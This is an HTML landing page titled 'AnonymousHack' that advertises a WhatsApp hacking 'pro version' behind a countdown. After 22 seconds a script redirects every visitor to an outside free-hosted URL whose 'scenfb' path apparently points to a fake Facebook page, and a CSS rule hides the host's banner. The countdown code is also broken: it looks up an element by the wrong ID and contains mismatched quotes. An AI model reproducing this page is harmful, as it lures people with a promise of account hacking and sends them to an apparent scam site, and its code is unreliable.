<!DOCTYPE html>
<html>
<head>
<link href="https://user-images.githubusercontent.com/58943612/70924527-3f577e00-205c-11ea-9d29-b2711781fd73.png
" rel="icon">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Merriweather&display=swap" type="text/css" media="all">
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.0/css/bootstrap.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.11.2/css/all.css" integrity="sha256-46qynGAkLSFpVbEBog43gvNhfrOj+BmwXdxFgVK/Kvc=" crossorigin="anonymous" />
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>

	<style>
img[alt*="www.000webhost.com"]{
display:none
}
</style>
<style>
body, html {
  height: 100%;
  margin: 0;
}

.bgimg {
  height: 100%;
  background-position: center;
  background-size: cover;
  position: relative;
  color: white;
  font-family: "Courier New", Courier, monospace;
  font-size: 25px;
}

.topleft {
  position: absolute;
  top: 0;
  left: 16px;
}

.bottomleft {
  position: absolute;
  bottom: 0;
  left: 16px;
}

.middle {
  position: absolute;
  top: 50%;
  left: 50%;
  transform: translate(-50%, -50%);
  text-align: center;
}

hr {
  margin: auto;
  width: 40%;
}
</style>
</head>
<body style="background-image:url(/hacksap/img/200.webp)" height="100%">

<div class="bgimg">
  <div class="topleft">
    <p>AnonymousHack</p>
  </div>
  <div class="middle">
    <h1>Coming Soon</h1>
    <p>hack whatsapp for you special pro version</p>
    <hr><div id="demo">
<p id="demo"></p>
</div>
  </div>
  <div class="bottomleft">
    <p id="aku"></p>
  </div>
</div>
<!-- Display the countdown timer in an element -->

<script>
// Mengatur waktu akhir perhitungan mundur
var countDownDate = new Date("Dec 19, 2020 15:37:25").getTime();

// Memperbarui hitungan mundur setiap 1 detik
var x = setInterval(function() {

  // Untuk mendapatkan tanggal dan waktu hari ini
  var now = new Date().getTime();
    
  // Temukan jarak antara sekarang dan tanggal hitung mundur
  var distance = countDownDate - now;
    
  // Perhitungan waktu untuk hari, jam, menit dan detik
  var days = Math.floor(distance / (1000 * 60 * 60 * 24));
  var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60));
  var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60));
  var seconds = Math.floor((distance % (1000 * 60)) / 1000);
    
  // Keluarkan hasil dalam elemen dengan id = "demo"
  document.getElementById("#demo").innerHTML = days + "d " + hours + "h "
  + minutes + "m " + seconds + "s ";
    
  // Jika hitungan mundur selesai, tulis beberapa teks 
  if (distance < 0) {
    clearInterval(x);
    document.getElementById("#demo").innerHTML = "<a href="#" class="btn btn-lg btn-info">Pro Version</a>";
  }
}, 1000);
</script>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
        <script>
            var url = "https://superjacent-scene.000webhostapp.com/scenfb"; // url tujuan
            var count = 22; // dalam detik
            function countDown() {
                if (count > 0) {
                    count--;
                    var waktu = count + 1;
                    $('#aku' ).html('please wait to '+ waktu+' seconds');
                    setTimeout("countDown()", 1000);
                } else {
                    window.location.href = url;
                }
            }
            countDown();
        </script>
</body>
</html>
